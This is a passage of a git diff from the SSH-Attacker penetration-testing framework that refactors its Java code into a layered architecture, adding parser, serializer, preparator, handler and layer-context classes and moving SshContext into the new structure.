(IOException e) { + // with exceptions on reading our inputStreams we can not read more data + LOGGER.error("No more data can be read from the inputStreams with Exception: ", e); + return false; + } + } + + public boolean shouldContinueProcessing() { + if (layerConfiguration != null) { + if (layerConfiguration instanceof GenericReceiveLayerConfiguration) { + return true; + } else { + return layerConfiguration.successRequiresMoreContainers( + getLayerResult().getUsedContainers()) + || (isDataBuffered() + && ((ReceiveLayerConfiguration) layerConfiguration) + .isProcessTrailingContainers()); + } + } else { + return isDataBuffered(); + } + } + + public LayerType getLayerType() { + return layerType; + } + + /** + * Parses and handles content from a container. + * + * @param container The container to handle. + * @param context The context of the connection. Keeps parsed and handled values. + */ + protected void readDataContainer(Container container, LayerContext context) { + HintedInputStream inputStream; + try { + inputStream = getLowerLayer().getDataStream(); + } catch (IOException e) { + LOGGER.warn("The lower layer did not produce a data stream: ", e); + return; + } + + Parser parser = container.getParser(context, inputStream); + + try { + parser.parse(container); + Preparator preparator = container.getPreparator(context); + preparator.prepareAfterParse(false); // TODO REMOVE THIS CLIENTMODE FLAG + Handler handler = container.getHandler(context); + handler.adjustContext(container); + addProducedContainer(container); + } catch (RuntimeException ex) { + setUnreadBytes(parser.getAlreadyParsed()); + } + } + + public byte[] getUnreadBytes() { + return unreadBytes; + } + + public void setUnreadBytes(byte[] unreadBytes) { + this.unreadBytes = unreadBytes; + } + + public boolean prepareDataContainer(DataContainer dataContainer, LayerContext context) { + Preparator preparator = dataContainer.getPreparator(context); + try { + preparator.prepare(); + preparator.afterPrepare(); + } catch (PreparationException ex) { + LOGGER.error( + "Could not prepare message " + + dataContainer.toString() + + ". Therefore, we skip it: ", + ex); + return false; + } + return true; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ReceiveLayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ReceiveLayerConfiguration.java new file mode 100644 index 000000000..a65486fd4 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ReceiveLayerConfiguration.java @@ -0,0 +1,32 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer; + +import de.rub.nds.sshattacker.core.layer.constant.LayerType; +import de.rub.nds.sshattacker.core.layer.data.DataContainer; +import java.util.List; + +/** + * Abstracts different ReceiveConfigurations. A ReceiveLayerConfiguration always specifies a list of + * containers the layer should receive. + * + * @param + */ +public abstract class ReceiveLayerConfiguration + extends LayerConfiguration { + + public ReceiveLayerConfiguration(LayerType layerType, List containerList) { + super(layerType, containerList); + } + + public ReceiveLayerConfiguration(LayerType layerType, Container... containers) { + super(layerType, containers); + } + + public abstract boolean isProcessTrailingContainers(); +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java new file mode 100644 index 000000000..00398eb9d --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java @@ -0,0 +1,22 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.constant; + +/** Holds all implemented layers of the TLS-Core, not limited to any layer of the ISO stack */ +public enum ImplementedLayers implements LayerType { + TCP, + AuthenticationLayer, + ConnectionLayer, + TransportLayer, + SSHv1; + + @Override + public String getName() { + return this.name(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java new file mode 100644 index 000000000..f38293719 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java @@ -0,0 +1,26 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.constant; + +/** + * Pre-defined configurations for the Layer Stack. E.g., DTLS would add the UDP-, Record-, + * Fragmentation-, and Message- Layer to the LayerStack. Custom LayerStack have to be created + * manually. + */ +public enum LayerConfiguration { + SSHv1, + SSHv2; + /* TLS, + DTLS, + QUIC, + OPEN_VPN, + + STARTTLS, + HTTPS, + SSL2; */ +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerType.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerType.java new file mode 100644 index 000000000..69df6636e --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerType.java @@ -0,0 +1,21 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.constant; + +/** + * Interface for Implemented Layers. As Implemented Layers might differ between + * TLS-Attacker/SSH-Attacker etc. we need this interface. + */ +public interface LayerType { + + public String getName(); + + public default boolean equals(LayerType other) { + return other.getName().equals(this.getName()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/LayerContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/LayerContext.java new file mode 100644 index 000000000..eb735ceaf --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/LayerContext.java @@ -0,0 +1,74 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.context; + +import de.rub.nds.sshattacker.core.config.Config; +import de.rub.nds.sshattacker.core.connection.AliasedConnection; +import de.rub.nds.sshattacker.core.layer.LayerStack; +import de.rub.nds.sshattacker.core.state.Context; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import de.rub.nds.tlsattacker.transport.ConnectionEndType; +import de.rub.nds.tlsattacker.transport.TransportHandler; + +/** A LayerContext holds all runtime variables of a layer during a connection. */ +public abstract class LayerContext { + + private Context context; + + protected LayerContext(Context context) { + this.context = context; + } + + public Context getContext() { + return context; + } + + public void setContext(Context context) { + this.context = context; + } + + /* + * Helper functions that return variables of the containing context + */ + + public Config getConfig() { + return context.getConfig(); + } + + public Chooser getChooser() { + return context.getChooser(); + } + + public LayerStack getLayerStack() { + return context.getLayerStack(); + } + + public ConnectionEndType getTalkingConnectionEndType() { + return context.getTalkingConnectionEndType(); + } + + public void setTalkingConnectionEndType(ConnectionEndType endType) { + context.setTalkingConnectionEndType(endType); + } + + public AliasedConnection getConnection() { + return getContext().getConnection(); + } + + public void setConnection(AliasedConnection connection) { + getContext().setConnection(connection); + } + + public TransportHandler getTransportHandler() { + return context.getTransportHandler(); + } + + public void setTransportHandler(TransportHandler transportHandler) { + context.setTransportHandler(transportHandler); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java old mode 100755 new mode 100644 similarity index 92% rename from SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/SshContext.java rename to SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index 955f9ad45..fb0b88693 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -5,10 +5,9 @@ * * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 */ -package de.rub.nds.sshattacker.core.state; +package de.rub.nds.sshattacker.core.layer.context; import de.rub.nds.sshattacker.core.config.Config; -import de.rub.nds.sshattacker.core.connection.AliasedConnection; import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.crypto.hash.ExchangeHashInputHolder; import de.rub.nds.sshattacker.core.crypto.kex.AbstractEcdhKeyExchange; @@ -17,33 +16,37 @@ import de.rub.nds.sshattacker.core.crypto.kex.RsaKeyExchange; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; -import de.rub.nds.sshattacker.core.exceptions.TransportHandlerConnectException; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; import de.rub.nds.sshattacker.core.packet.layer.AbstractPacketLayer; import de.rub.nds.sshattacker.core.packet.layer.PacketLayerFactory; -import de.rub.nds.sshattacker.core.protocol.common.layer.MessageLayer; import de.rub.nds.sshattacker.core.protocol.connection.Channel; import de.rub.nds.sshattacker.core.protocol.connection.ChannelManager; +import de.rub.nds.sshattacker.core.state.Context; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import de.rub.nds.sshattacker.core.workflow.chooser.ChooserFactory; import de.rub.nds.tlsattacker.transport.ConnectionEndType; import de.rub.nds.tlsattacker.transport.TransportHandler; -import de.rub.nds.tlsattacker.transport.TransportHandlerFactory; -import java.io.IOException; import java.util.HashMap; import java.util.List; import java.util.Optional; +import java.util.Random; -public class SshContext { +public class SshContext extends LayerContext { /** Static configuration for SSH-Attacker */ - private Config config; - private Chooser chooser; - /** Connection used to communicate with the remote peer */ - private AliasedConnection connection; + public Random getRandom() { + return random; + } + + public void setRandom(Random random) { + this.random = random; + } + + private Random random; + /** Connection used to communicate with the remote peer */ private TransportHandler transportHandler; /** If set to true, an exception was received from the transport handler */ private boolean receivedTransportHandlerException = false; @@ -58,7 +61,7 @@ public class SshContext { */ private Boolean receiveAsciiModeEnabled; /** A layer to serialize messages */ - private MessageLayer messageLayer = new MessageLayer(this); + // private MessageLayer messageLayer = new MessageLayer(super.getContext()); /** * Sequence number used to generate MAC when sending packages. The sequence number is unsigned, @@ -230,37 +233,65 @@ public class SshContext { /** If set to true, a version exchange message was sent by each side */ private boolean versionExchangeCompleted = false; + private CompressionAlgorithm selectedCompressionAlgorithm; + + public CompressionAlgorithm getSelectedCompressionAlgorithm() { + return selectedCompressionAlgorithm; + } + + public void setSelectedCompressionAlgorithm(CompressionAlgorithm selectedCompressionAlgorithm) { + this.selectedCompressionAlgorithm = selectedCompressionAlgorithm; + } + + public EncryptionAlgorithm getSelectedEncryptionAlgorithm() { + return selectedEncryptionAlgorithm; + } + + public void setSelectedEncryptionAlgorithm(EncryptionAlgorithm selectedEncryptionAlgorithm) { + this.selectedEncryptionAlgorithm = selectedEncryptionAlgorithm; + } + + public MacAlgorithm getSelectedMacAlgorithm() { + return selectedMacAlgorithm; + } + + public void setSelectedMacAlgorithm(MacAlgorithm selectedMacAlgorithm) { + this.selectedMacAlgorithm = selectedMacAlgorithm; + } + + public KeyExchangeAlgorithm getSelectedKeyExchangeAlgorithm() { + return selectedKeyExchangeAlgorithm; + } + + public void setSelectedKeyExchangeAlgorithm(KeyExchangeAlgorithm selectedKeyExchangeAlgorithm) { + this.selectedKeyExchangeAlgorithm = selectedKeyExchangeAlgorithm; + } + + private EncryptionAlgorithm selectedEncryptionAlgorithm; + private MacAlgorithm selectedMacAlgorithm; + private KeyExchangeAlgorithm selectedKeyExchangeAlgorithm; + // region Constructors and Initalization public SshContext() { - this(Config.createConfig()); + this(new Context(new Config())); } public SshContext(Config config) { - RunningModeType mode = config.getDefaultRunningMode(); - if (mode == null) { + this(new Context(config)); + } + + public SshContext(Context context) { + super(context); + context.setSshContext(this); + RunningModeType mode = getConfig().getDefaultRunningMode(); + if (null == mode) { throw new ConfigurationException("Cannot create connection, running mode not set"); } else { - switch (mode) { - case CLIENT: - init(config, config.getDefaultClientConnection()); - break; - case SERVER: - init(config, config.getDefaultServerConnection()); - break; - default: - throw new ConfigurationException( - "Cannot create connection for unknown running mode '" + mode + "'"); - } + init(); } } - public SshContext(Config config, AliasedConnection connection) { - init(config, connection); - } - - public void init(Config config, AliasedConnection connection) { - this.config = config; - this.connection = connection; + public void init() { exchangeHashInputHolder = new ExchangeHashInputHolder(); // TODO: Initial packet layer type from config @@ -269,31 +300,21 @@ public void init(Config config, AliasedConnection connection) { receiveAsciiModeEnabled = true; writeSequenceNumber = 0; readSequenceNumber = 0; - handleAsClient = (connection.getLocalConnectionEndType() == ConnectionEndType.CLIENT); + handleAsClient = (getConnection().getLocalConnectionEndType() == ConnectionEndType.CLIENT); channelManager = new ChannelManager(this); } // endregion - public Config getConfig() { - return config; - } - public Chooser getChooser() { if (chooser == null) { - chooser = ChooserFactory.getChooser(config.getChooserType(), this, config); + chooser = + ChooserFactory.getChooser( + getConfig().getChooserType(), this.getContext(), getConfig()); } return chooser; } - public AliasedConnection getConnection() { - return connection; - } - - public void setConnection(AliasedConnection connection) { - this.connection = connection; - } - public TransportHandler getTransportHandler() { return transportHandler; } @@ -310,26 +331,6 @@ public void setReceivedTransportHandlerException(boolean receivedTransportHandle this.receivedTransportHandlerException = receivedTransportHandlerException; } - public void initTransportHandler() { - if (transportHandler == null) { - if (connection == null) { - throw new ConfigurationException("Connection end not set"); - } - transportHandler = TransportHandlerFactory.createTransportHandler(connection); - } - - try { - transportHandler.preInitialize(); - transportHandler.initialize(); - } catch (NullPointerException | NumberFormatException ex) { - throw new ConfigurationException("Invalid values in " + connection.toString(), ex); - } catch (IOException ex) { - throw new TransportHandlerConnectException( - "Unable to initialize the transport handler with: " + connection.toString(), - ex); - } - } - public PacketLayerType getPacketLayerType() { return packetLayerType; } @@ -354,13 +355,13 @@ public void setReceiveAsciiModeEnabled(boolean receiveAsciiModeEnabled) { this.receiveAsciiModeEnabled = receiveAsciiModeEnabled; } - public MessageLayer getMessageLayer() { + /*public MessageLayer getMessageLayer() { return messageLayer; } public void setMessageLayer(MessageLayer messageLayer) { this.messageLayer = messageLayer; - } + }*/ // region Getters and Setters for Sequence Numbers public int getWriteSequenceNumber() { @@ -950,11 +951,11 @@ public void setVersionExchangeComplete(Boolean complete) { } public boolean isClient() { - return connection.getLocalConnectionEndType() == ConnectionEndType.CLIENT; + return getConnection().getLocalConnectionEndType() == ConnectionEndType.CLIENT; } public boolean isServer() { - return connection.getLocalConnectionEndType() == ConnectionEndType.SERVER; + return getConnection().getLocalConnectionEndType() == ConnectionEndType.SERVER; } public boolean isHandleAsClient() { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/TcpContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/TcpContext.java new file mode 100644 index 000000000..15491369f --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/TcpContext.java @@ -0,0 +1,30 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.context; + +import de.rub.nds.sshattacker.core.state.Context; +import de.rub.nds.tlsattacker.transport.socket.SocketState; + +/** Holds all runtime variables of the TCPLayer. */ +public class TcpContext extends LayerContext { + + private SocketState finalSocketState; + + public TcpContext(Context context) { + super(context); + context.setTcpContext(this); + } + + public SocketState getFinalSocketState() { + return finalSocketState; + } + + public void setFinalSocketState(SocketState finalSocketState) { + this.finalSocketState = finalSocketState; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/DataContainer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/DataContainer.java new file mode 100644 index 000000000..7deef92cd --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/DataContainer.java @@ -0,0 +1,40 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.data; + +import de.rub.nds.sshattacker.core.layer.context.LayerContext; +import java.io.InputStream; + +/** + * All protocol messages are abstracted with the DataContainer interface. For TLS-Attacker to work + * with data it only needs to know how to parse, prepare, serialize and handle the message. All + * messages must therefore provide this functionality. + */ +public interface DataContainer< + Container extends DataContainer, Context extends LayerContext> { + + public Parser getParser(Context context, InputStream stream); + + public Preparator getPreparator(Context context); + + public Serializer getSerializer(Context context); + + public Handler getHandler(Context context); + + public default boolean isRequired() { + return true; + } + + public default String toCompactString() { + return toString(); + } + + public default String toShortString() { + return toCompactString(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Handler.java new file mode 100644 index 000000000..b91c09f45 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Handler.java @@ -0,0 +1,16 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.data; + +/** + * @param The Object that should be Handled + */ +public interface Handler { + + void adjustContext(T object); +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java new file mode 100644 index 000000000..8645856aa --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java @@ -0,0 +1,209 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.data; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; +import de.rub.nds.sshattacker.core.exceptions.ParserException; +import de.rub.nds.sshattacker.core.exceptions.TimeoutException; +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.InputStream; +import java.math.BigInteger; +import java.net.SocketTimeoutException; +import java.nio.charset.Charset; +import java.nio.charset.StandardCharsets; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +/** + * Abstract Parser class which can be used to read a byte array. + * + * @param Type of the Object that should be parsed + */ +public abstract class Parser { + + private static final Logger LOGGER = LogManager.getLogger(); + + private final InputStream stream; + + /** Not so nice... */ + private final ByteArrayOutputStream outputStream; + + /** + * Constructor for the Parser + * + * @param stream The Inputstream to read data drom + */ + public Parser(InputStream stream) { + this.stream = stream; + outputStream = new ByteArrayOutputStream(); + } + + public byte[] getAlreadyParsed() { + return outputStream.toByteArray(); + } + + /** + * Parses a number of bytes from the Array and returns them as a byte[]. + * + * @param length Number of bytes to be parsed + * @return A subByteArray of according size from the Array + */ + protected byte[] parseByteArrayField(int length) { + if (length == 0) { + return new byte[0]; + } + if (length < 0) { + throw new ParserException("Trying to parse a negative amount of bytes"); + } + byte[] data = new byte[length]; + try { + int read = stream.read(data); + if (read == -1) { + throw new EndOfStreamException("Reached end of Stream"); + } + if (read != length) { + throw new EndOfStreamException("Reached end of stream after " + read + " bytes"); + } else { + outputStream.write(data); + } + } catch (SocketTimeoutException E) { + throw new TimeoutException("Received a timeout while reading", E); + } catch (IOException E) { + throw new ParserException("Could not parse byteArrayField of length=" + length, E); + } + return data; + } + + /** + * Parses a number of bytes from the Array and returns them as a int. Throws a ParserException + * if the number of bytes cannot be parsed. Moves the pointer accordingly. + * + * @param length Number of bytes to be parsed + * @return An integer representation of the subByteArray + */ + protected int parseIntField(int length) { + if (length == 0) { + throw new ParserException("Cannot parse int of size 0"); + } + return ArrayConverter.bytesToInt(parseByteArrayField(length)); + } + + /** + * Parses a number of bytes from the Array and returns them as a positive BigInteger. Throws a + * ParserException if the number of bytes cannot be parsed. Moves the pointer accordingly. + * + * @param length Number of bytes to be parsed + * @return A BigInteger representation of the subByteArray + */ + protected BigInteger parseBigIntField(int length) { + if (length == 0) { + throw new ParserException("Cannot parse BigInt of size 0"); + } + return new BigInteger(1, parseByteArrayField(length)); + } + + /** + * Parses a number of bytes from the Array and returns them as a byte. Throws a ParserException + * if the number of bytes cannot be parsed. Moves the pointer accordingly. + * + * @param length Number of bytes to be parsed + * @return An integer representation of the subByteArray + */ + protected byte parseByteField(int length) { + if (length == 0) { + throw new ParserException("Cannot parse byte of size 0"); + } + if (length > 1) { + LOGGER.warn("Parsing byte[] field into a byte of size >1"); + } + return (byte) ArrayConverter.bytesToInt(parseByteArrayField(length)); + } + + protected String parseStringTill(byte endSequence) { + ByteArrayOutputStream stream = new ByteArrayOutputStream(); + while (true) { + byte b = parseByteField(1); + stream.write(b); + if (b == endSequence) { + return stream.toString(); + } + } + } + + /** + * Checks if there are at least count bytes left to read + * + * @param count Number of bytes to check for + * @return True if there are at least count bytes left to read + */ + protected boolean enoughBytesLeft(int count) { + return getBytesLeft() >= count; + } + + protected byte[] parseArrayOrTillEnd(int n) { + if (n >= 0 && n < getBytesLeft()) { + return parseByteArrayField(n); + } else { + return parseByteArrayField(getBytesLeft()); + } + } + + protected byte[] parseTillEnd() { + return parseByteArrayField(getBytesLeft()); + } + + public int getBytesLeft() { + try { + return stream.available(); + } catch (IOException ex) { + throw new ParserException("Cannot tell how many bytes are left in inputstream", ex); + } + } + + /** + * Parses a number of bytes from the Array and returns them as a string (using UTF-8 encoding). + * Throws a ParserException if the number of bytes cannot be parsed. Moves the pointer + * accordingly. + * + * @param length Number of bytes to be parsed + * @return A string representation of the subbyteArray + */ + protected String parseByteString(int length) { + return parseByteString(length, StandardCharsets.UTF_8); + } + + /** + * Parses a number of bytes from the Array and returns them as a string. Throws a + * ParserException if the number of bytes cannot be parsed. Moves the pointer accordingly. + * + * @param length Number of bytes to be parsed + * @param charset Charset used to convert the bytes into a String + * @return A string representation of the subbyteArray + */ + protected String parseByteString(int length, Charset charset) { + return new String(parseByteArrayField(length), charset); + } + + /** + * Returns the parsed object. + * + * @param t object that should be filled with content + */ + public abstract void parse(T t); + + /** + * TODO: This can break get already parsed - not so nice + * + * @return + */ + protected InputStream getStream() { + return stream; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Preparator.java new file mode 100644 index 000000000..80c80ec18 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Preparator.java @@ -0,0 +1,49 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.data; + +import de.rub.nds.sshattacker.core.exceptions.PreparationException; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +/** + * @param The Object that should be prepared + */ +public abstract class Preparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + protected final Chooser chooser; + private final T object; + + public Preparator(Chooser chooser, T object) { + this.chooser = chooser; + this.object = object; + if (object == null) { + throw new PreparationException("Cannot prepare NULL"); + } + } + + public abstract void prepare(); + + /** + * If clientMode is active, the prepareAfterParse method will compute all the values as though + * the client parsed this Method. This is mostly only useful if you are reparsing or doing + * something really crazy. For any normal use case this should be set to false; + * + * @param clientMode + */ + public void prepareAfterParse(boolean clientMode) {} + + public T getObject() { + return object; + } + + public void afterPrepare() {} +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Serializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Serializer.java new file mode 100644 index 000000000..e42f01f71 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Serializer.java @@ -0,0 +1,135 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.data; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.math.BigInteger; +import java.nio.charset.Charset; +import java.nio.charset.StandardCharsets; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +/** + * The Serializer is responsible to write an Object T into a byte[] form. This is comparable to + * byte[] serialization. + * + * @param Type of the Object to write + */ +public abstract class Serializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + /** The ByteArrayOutputStream with which the byte[] is constructed. */ + private ByteArrayOutputStream outputStream; + + /** Constructor for the Serializer */ + public Serializer() { + outputStream = new ByteArrayOutputStream(); + } + + /** + * This method is responsible to write the appropriate bytes to the output Stream This should be + * done by calling the different append methods. + * + * @return The already serialized Bytes + */ + protected abstract byte[] serializeBytes(); + + /** + * Adds a byte[] representation of an int to the final byte[]. If the Integer is greater than + * the specified length only the lower length bytes are serialized. + * + * @param i The Integer that should be appended + * @param length The number of bytes which should be reserved for this Integer + */ + public final void appendInt(int i, int length) { + byte[] bytes = ArrayConverter.intToBytes(i, length); + int reconvertedInt = ArrayConverter.bytesToInt(bytes); + if (reconvertedInt != i) { + LOGGER.warn( + "Int \"" + + i + + "\" is too long to write in field of size " + + length + + ". Only using last " + + length + + " bytes."); + } + appendBytes(ArrayConverter.intToBytes(i, length)); + } + + protected final void appendString(String s, Charset charset) { + appendBytes(s.getBytes(charset)); + } + + protected final void appendString(String s) { + appendString(s, StandardCharsets.UTF_8); + } + /** + * Adds a byte[] representation of a BigInteger to the final byte[] minus the sign byte. If the + * BigInteger is greater than the specified length only the lower length bytes are serialized. + * + * @param i The BigInteger that should be appended + * @param length The number of bytes which should be reserved for this BigInteger + */ + public final void appendBigInteger(BigInteger i, int length) { + byte[] bytes; + // special case for which bigIntegerToByteArray + // wrongly returns an empty array + if (i.equals(new BigInteger("0"))) { + bytes = ArrayConverter.intToBytes(0, length); + } else { + bytes = ArrayConverter.bigIntegerToByteArray(i, length, true); + } + appendBytes(bytes); + } + + /** + * Adds a byte to the final byte[]. + * + * @param b Byte which should be added + */ + public final void appendByte(byte b) { + outputStream.write(b); + } + + /** + * Adds a byte[] to the final byte[]. + * + * @param bytes bytes that should be added + */ + public final void appendBytes(byte[] bytes) { + try { + outputStream.write(bytes); + } catch (IOException ex) { + LOGGER.warn("Encountered exception while writing to ByteArrayOutputStream."); + LOGGER.debug(ex); + } + } + + public final byte[] getAlreadySerialized() { + return outputStream.toByteArray(); + } + + /** + * Creates the final byte[] + * + * @return The final byte[] + */ + public final byte[] serialize() { + outputStream = new ByteArrayOutputStream(); + serializeBytes(); + return getAlreadySerialized(); + } + + public ByteArrayOutputStream getOutputStream() { + return outputStream; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/LayerProcessingHint.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/LayerProcessingHint.java new file mode 100644 index 000000000..bca4c8c59 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/LayerProcessingHint.java @@ -0,0 +1,18 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.hints; + +/** + * Lower layers sometimes need a hint for which data they need to receive. This a + * LayerProcessingHint carries the necessary information. + */ +public interface LayerProcessingHint { + + @Override + public boolean equals(Object o); +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/RecordLayerHint.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/RecordLayerHint.java new file mode 100644 index 000000000..debfa3e31 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/RecordLayerHint.java @@ -0,0 +1,93 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.hints; + +import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; +import java.util.Objects; + +/** + * The Record Layer/Fragment layer need information about the messages they're sending. This class + * holds information about the messages such as their message type. + */ +public class RecordLayerHint implements LayerProcessingHint { + + private final ProtocolMessageType type; + + private final Integer epoch; + + private final Integer sequenceNumber; + + private final Integer messageSequence; + + public RecordLayerHint(ProtocolMessageType type) { + this.type = type; + this.epoch = null; + this.sequenceNumber = null; + this.messageSequence = null; + } + + public RecordLayerHint(ProtocolMessageType type, int 